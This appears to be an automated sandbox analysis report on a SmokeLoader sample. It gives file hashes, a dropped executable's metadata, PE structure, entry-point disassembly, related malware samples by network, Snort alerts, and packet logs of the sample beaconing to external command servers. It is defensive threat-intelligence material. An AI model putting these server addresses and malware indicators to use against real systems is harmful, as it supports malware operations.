	YWwcRHSpbw.exe	Get hash	malicious	SmokeLoader	Browse	187.211.208.213
	i1crvbOZAP.exe	Get hash	malicious	Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	37.255.238.137

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
KIXS-AS-KRKoreaTelecomKR	SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe	Get hash	malicious	FormBook, GuLoader	Browse	112.175.50.218
	WwKYOW4jIg.elf	Get hash	malicious	Mirai	Browse	222.112.186.45
	tw7rloKDkG.elf	Get hash	malicious	Mirai	Browse	175.219.70.176
	ZcOjro0Chh.elf	Get hash	malicious	Mirai	Browse	14.32.5.202
	uqGHhft2DO.elf	Get hash	malicious	Mirai	Browse	183.127.235.108
	5RiFmXTOMp.elf	Get hash	malicious	Mirai	Browse	175.216.85.211
	Hs97Nxxy5u.elf	Get hash	malicious	Mirai	Browse	175.250.196.247
	sBgS8t0K7i.elf	Get hash	malicious	Mirai	Browse	211.34.203.16
	n0CEgmtnuf.elf	Get hash	malicious	Mirai	Browse	221.160.166.181
	bUuAPqXmkL.elf	Get hash	malicious	Mirai	Browse	59.26.88.68
AMERICATELPERUSAPE	E8zldNa4ks.elf	Get hash	malicious	Unknown	Browse	190.187.188.187
	SSDAIG33Zh.exe	Get hash	malicious	Babuk, Djvu	Browse	190.187.52.42
	6A9jBmgfEz.elf	Get hash	malicious	Mirai	Browse	190.187.132.110
	4JJkk655SP.elf	Get hash	malicious	Unknown	Browse	190.187.141.172
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	190.187.52.42
	01vS5TqGur.elf	Get hash	malicious	Mirai	Browse	190.187.141.142
	L5dJXUt9Sz.elf	Get hash	malicious	Mirai	Browse	190.187.141.144
	fnKtfdi0P0.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc, Xmrig	Browse	190.187.52.42
	O1yQjHheL6.exe	Get hash	malicious	Amadey, PureLog Stealer, SmokeLoader	Browse	190.187.52.42
	Oa5MQwNPBq.exe	Get hash	malicious	LummaC, Babuk, Djvu, PureLog Stealer, RedLine, SmokeLoader	Browse	190.187.52.42

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\ivfjsrs

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	305152
Entropy (8bit):	6.518070145151798
Encrypted:	false
SSDEEP:	3072:IHNWG9ZvpYjEk+P0VL9xFD3GeiRsBbaAcNrw5K86+i2XmSIN8niFWhr:vAqQkdxl3tilNF86Ph8nPr
MD5:	EE4E08FEBD22E594C7BCB70EA1B0252A
SHA1:	B1594033FA6E0377CCAEA80D1556459128C61A13
SHA-256:	3B6C00F64A1D047DFBED967D4FE8F320F4E4DE9421A82D94DCB3EBA07F23D939
SHA-512:	255190C874BF83BE9B4126FB7C3DBEE8EB4F4B6C5BC019EE5C586B984115B03759C3A511EFCB8C79797E7CC0141C75A8F715316B214D6683A8C25015D316DDD8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 44%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................q.....N.......O......=.........X/K.....u...X/p...Rich..........................PE..L.....c.....................\|......WD....... ....@...........................................................................(....0...g...........................!..8............................x..@............ ..\|............................text...5........................... ..`.rdata..rl... ...n..................@..@.data...............t..............@....rsrc....g...0...h...,..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ivfjsrs:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.518070145151798
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	rBwTlpgnjc.exe
File size:	305'152 bytes
MD5:	ee4e08febd22e594c7bcb70ea1b0252a
SHA1:	b1594033fa6e0377ccaea80d1556459128c61a13
SHA256:	3b6c00f64a1d047dfbed967d4fe8f320f4e4de9421a82d94dcb3eba07f23d939
SHA512:	255190c874bf83be9b4126fb7c3dbee8eb4f4b6c5bc019ee5c586b984115b03759c3a511efcb8c79797e7cc0141c75a8f715316b214d6683a8c25015d316ddd8
SSDEEP:	3072:IHNWG9ZvpYjEk+P0VL9xFD3GeiRsBbaAcNrw5K86+i2XmSIN8niFWhr:vAqQkdxl3tilNF86Ph8nPr
TLSH:	E3544A0362E17CA0E62247728F2EBAEC3B2DFD654F556B2723585E0B18741F0D263B56
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................q.......N.......O.......=.............X/K.......u.....X/p.....Rich............................PE..L......c...

File Icon


Icon Hash:	4111414d4545610d

Static PE Info

General

Entrypoint:	0x404457
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63D9BDDC [Wed Feb 1 01:18:20 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fee2e01e9ecb27c28da2b6fc37f265e9

Entrypoint Preview

Instruction
call 00007F0AD0BAE002h
jmp 00007F0AD0BA8185h
push 00000014h
push 00417FD8h
call 00007F0AD0BAB3F8h
call 00007F0AD0BAE1D3h
movzx esi, ax
push 00000002h
call 00007F0AD0BADF95h
pop ecx
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
je 00007F0AD0BA8186h
xor ebx, ebx
jmp 00007F0AD0BA81B5h
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 00007F0AD0BA816Dh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 00007F0AD0BA815Fh
xor ebx, ebx
cmp dword ptr [eax+00400074h], 0Eh
jbe 00007F0AD0BA818Bh
cmp dword ptr [eax+004000E8h], ebx
setne bl
mov dword ptr [ebp-1Ch], ebx
call 00007F0AD0BAA5CFh
test eax, eax
jne 00007F0AD0BA818Ah
push 0000001Ch
call 00007F0AD0BA8261h
pop ecx
call 00007F0AD0BA9B82h
test eax, eax
jne 00007F0AD0BA818Ah
push 00000010h
call 00007F0AD0BA8250h
pop ecx
call 00007F0AD0BAE00Eh
and dword ptr [ebp-04h], 00000000h
call 00007F0AD0BAC3B1h
test eax, eax
jns 00007F0AD0BA818Ah
push 0000001Bh
call 00007F0AD0BA8236h
pop ecx
call dword ptr [004120B0h]
mov dword ptr [040221E4h], eax
call 00007F0AD0BAE029h
mov dword ptr [0043474Ch], eax
call 00007F0AD0BADBE6h
test eax, eax
jns 00007F0AD0BA818Ah

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x183e4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c23000	0x167e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3c3a000	0x1380	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x121f0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x178f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x12000	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x10035	0x10200	4f9e4c23291af98ce906d4794e50b6e5	False	0.6008660368217055	data	6.697335444882217	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x12000	0x6c72	0x6e00	e2d73d3b44c95c749ad396d574d1f352	False	0.38966619318181817	data	4.7269437397183935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x3c091e8	0x1b800	17ef8710008af065e3a1993cc59a78a3	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c23000	0x167e0	0x16800	6d5fccfdf3d87f80f094865b42c86796	False	0.4258572048611111	data	4.959479448152928	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3c3a000	0x1380	0x1400	2f407534a4dc25a7b6ae3459d0b7246c	False	0.747265625	data	6.463258994354438	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x3c39020	0xe	data	1.5714285714285714
RT_ICON	0x3c236e0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.41647465437788017
RT_ICON	0x3c23da8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.16410788381742739
RT_ICON	0x3c26350	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.21365248226950354
RT_ICON	0x3c267e8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.3664712153518124
RT_ICON	0x3c27690	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.45442238267148016
RT_ICON	0x3c27f38	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.45506912442396313
RT_ICON	0x3c28600	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.4638728323699422
RT_ICON	0x3c28b68	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.2683609958506224
RT_ICON	0x3c2b110	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.3072232645403377
RT_ICON	0x3c2c1b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.35106382978723405
RT_ICON	0x3c2c688	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.5687633262260128
RT_ICON	0x3c2d530	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.5496389891696751
RT_ICON	0x3c2ddd8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.619942196531792
RT_ICON	0x3c2e340	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.46141078838174276
RT_ICON	0x3c308e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.48850844277673544
RT_ICON	0x3c31990	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.49221311475409835
RT_ICON	0x3c32318	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.449468085106383
RT_ICON	0x3c327e8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.4240405117270789
RT_ICON	0x3c33690	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.4833032490974729
RT_ICON	0x3c33f38	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.5835253456221198
RT_ICON	0x3c34600	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.4913294797687861
RT_ICON	0x3c34b68	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.4701244813278008
RT_ICON	0x3c37110	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4878048780487805
RT_ICON	0x3c381b8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.5032786885245901
RT_ICON	0x3c38b40	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.5514184397163121
RT_STRING	0x3c39270	0x2bc	data	0.49142857142857144
RT_STRING	0x3c39530	0x2ac	data	0.48830409356725146
RT_GROUP_ICON	0x3c32780	0x68	data	0.7115384615384616
RT_GROUP_ICON	0x3c2c620	0x68	data	0.6826923076923077
RT_GROUP_ICON	0x3c267b8	0x30	data	0.9375
RT_GROUP_ICON	0x3c38fa8	0x76	data	0.6779661016949152
RT_VERSION	0x3c39030	0x23c	data	0.5367132867132867

Imports

DLL

Import

KERNEL32.dll

GlobalMemoryStatus, GetLocaleInfoA, LocalCompact, InterlockedDecrement, GetComputerNameW, CreateHardLinkA, GetSystemDefaultLCID, BackupSeek, GetTickCount, GetConsoleAliasesA, GetWindowsDirectoryA, EnumTimeFormatsW, GetUserDefaultLangID, SetCommState, GlobalAlloc, LoadLibraryW, ReadConsoleInputA, WriteConsoleW, GetModuleFileNameW, MultiByteToWideChar, GetLastError, ChangeTimerQueueTimer, SetLastError, GetThreadLocale, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, BuildCommDCBW, LoadLibraryA, SetCalendarInfoW, GetExitCodeThread, AddAtomW, CreateEventW, GlobalFindAtomW, GetOEMCP, LoadLibraryExA, VirtualProtect, GetConsoleProcessList, GetTempPathA, GetVolumeInformationW, HeapAlloc, EncodePointer, DecodePointer, IsProcessorFeaturePresent, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, IsValidCodePage, GetACP, GetCPInfo, GetCurrentThreadId, HeapFree, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, GetStdHandle, WriteFile, GetProcessHeap, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, GetFileType, GetStartupInfoW, CloseHandle, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, GetStringTypeW, LoadLibraryExW, OutputDebugStringW, LCMapStringW, SetStdHandle, SetFilePointerEx, HeapReAlloc, CreateFileW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/26/24-11:50:57.657192	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49750	80	192.168.2.5	190.187.52.42
04/26/24-11:48:53.977641	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49727	80	192.168.2.5	119.204.11.2
04/26/24-11:49:35.592735	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49736	80	192.168.2.5	119.204.11.2
04/26/24-11:49:00.896944	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49730	80	192.168.2.5	119.204.11.2
04/26/24-11:50:23.070925	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49744	80	192.168.2.5	190.187.52.42
04/26/24-11:47:23.987965	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49713	80	192.168.2.5	119.204.11.2
04/26/24-11:47:22.464464	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49712	80	192.168.2.5	119.204.11.2
04/26/24-11:47:29.304265	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49716	80	192.168.2.5	119.204.11.2
04/26/24-11:50:39.540792	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49747	80	192.168.2.5	190.187.52.42
04/26/24-11:48:43.367329	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49722	80	192.168.2.5	119.204.11.2
04/26/24-11:49:47.864493	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49738	80	192.168.2.5	119.204.11.2
04/26/24-11:50:11.655696	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49742	80	192.168.2.5	190.187.52.42
04/26/24-11:47:27.784659	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49715	80	192.168.2.5	119.204.11.2
04/26/24-11:50:44.236303	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49748	80	192.168.2.5	190.187.52.42
04/26/24-11:49:56.135562	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49739	80	192.168.2.5	190.187.52.42
04/26/24-11:48:46.715630	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49724	80	192.168.2.5	119.204.11.2
04/26/24-11:47:32.343784	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49718	80	192.168.2.5	119.204.11.2
04/26/24-11:50:28.180861	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49745	80	192.168.2.5	190.187.52.42
04/26/24-11:49:18.365467	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49733	80	192.168.2.5	119.204.11.2
04/26/24-11:47:25.556178	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49714	80	192.168.2.5	119.204.11.2
04/26/24-11:47:30.826079	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49717	80	192.168.2.5	119.204.11.2
04/26/24-11:47:20.949841	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49711	80	192.168.2.5	119.204.11.2
04/26/24-11:50:02.490715	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49740	80	192.168.2.5	190.187.52.42
04/26/24-11:50:32.759541	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49746	80	192.168.2.5	190.187.52.42
04/26/24-11:49:23.641505	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49734	80	192.168.2.5	119.204.11.2
04/26/24-11:48:57.550009	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49729	80	192.168.2.5	119.204.11.2
04/26/24-11:49:05.885669	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49731	80	192.168.2.5	119.204.11.2
04/26/24-11:48:50.067757	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49726	80	192.168.2.5	119.204.11.2
04/26/24-11:50:16.085964	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49743	80	192.168.2.5	190.187.52.42
04/26/24-11:49:30.712687	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49735	80	192.168.2.5	119.204.11.2
04/26/24-11:48:48.305830	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49725	80	192.168.2.5	119.204.11.2
04/26/24-11:48:55.896378	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49728	80	192.168.2.5	119.204.11.2
04/26/24-11:47:33.917741	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49719	80	192.168.2.5	119.204.11.2
04/26/24-11:49:12.723020	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49732	80	192.168.2.5	119.204.11.2
04/26/24-11:50:07.106115	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49741	80	192.168.2.5	190.187.52.42
04/26/24-11:48:44.986285	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49723	80	192.168.2.5	119.204.11.2
04/26/24-11:49:40.768533	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49737	80	192.168.2.5	119.204.11.2
04/26/24-11:47:35.150965	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49720	80	192.168.2.5	119.204.11.2
04/26/24-11:50:49.712608	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49749	80	192.168.2.5	190.187.52.42

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 11:47:20.625984907 CEST	49711	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:20.949477911 CEST	80	49711	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:20.949599981 CEST	49711	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:20.949841022 CEST	49711	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:20.949866056 CEST	49711	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:21.272655010 CEST	80	49711	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:22.135804892 CEST	80	49711	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:22.135905981 CEST	80	49711	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:22.136003017 CEST	49711	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:22.136928082 CEST	49711	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:22.141020060 CEST	49712	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:22.460297108 CEST	80	49711	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:22.464209080 CEST	80	49712	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:22.464299917 CEST	49712	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:22.464463949 CEST	49712	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:22.464495897 CEST	49712	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:22.787415981 CEST	80	49712	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:23.658689976 CEST	80	49712	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:23.658716917 CEST	80	49712	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:23.658782959 CEST	49712	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:23.658989906 CEST	49712	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:23.662667036 CEST	49713	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:23.982187986 CEST	80	49712	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:23.987692118 CEST	80	49713	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:23.987780094 CEST	49713	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:23.987965107 CEST	49713	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:23.987986088 CEST	49713	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:24.314064026 CEST	80	49713	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:25.165426970 CEST	80	49713	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:25.165448904 CEST	80	49713	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:25.165627956 CEST	49713	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:25.165817976 CEST	49713	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:25.169648886 CEST	49714	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:25.491386890 CEST	80	49713	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:25.494249105 CEST	80	49714	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:25.497134924 CEST	49714	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:25.556178093 CEST	49714	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:25.557106018 CEST	49714	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:25.881680965 CEST	80	49714	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:26.740653992 CEST	80	49714	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:26.740689039 CEST	80	49714	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:26.740855932 CEST	49714	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:26.893112898 CEST	49714	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:27.218122005 CEST	80	49714	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:27.460973024 CEST	49715	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:27.784348011 CEST	80	49715	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:27.784564018 CEST	49715	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:27.784658909 CEST	49715	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:27.784682989 CEST	49715	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:28.108074903 CEST	80	49715	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:28.977370024 CEST	80	49715	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:28.977396011 CEST	80	49715	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:28.977511883 CEST	49715	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:28.978363991 CEST	49715	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:28.981178999 CEST	49716	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:29.301593065 CEST	80	49715	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:29.304022074 CEST	80	49716	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:29.304102898 CEST	49716	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:29.304265022 CEST	49716	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:29.304290056 CEST	49716	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:29.627291918 CEST	80	49716	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:30.499388933 CEST	80	49716	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:30.499414921 CEST	80	49716	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:30.499505043 CEST	49716	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:30.499664068 CEST	49716	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:30.502599001 CEST	49717	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:30.822741032 CEST	80	49716	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:30.825825930 CEST	80	49717	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:30.826004982 CEST	49717	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:30.826078892 CEST	49717	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:30.826106071 CEST	49717	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:31.154119968 CEST	80	49717	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:32.017399073 CEST	80	49717	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:32.017426014 CEST	80	49717	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:32.017530918 CEST	49717	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:32.017754078 CEST	49717	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:32.020759106 CEST	49718	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:32.341816902 CEST	80	49717	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:32.343493938 CEST	80	49718	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:32.343606949 CEST	49718	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:32.343784094 CEST	49718	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:32.343822002 CEST	49718	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:32.666712999 CEST	80	49718	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:33.586575985 CEST	80	49718	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:33.586605072 CEST	80	49718	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:33.586692095 CEST	49718	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:33.587172031 CEST	49718	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:33.595417023 CEST	49719	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:33.909780025 CEST	80	49718	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:33.917362928 CEST	80	49719	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:33.917530060 CEST	49719	80	192.168.2.5	119.204.11.2
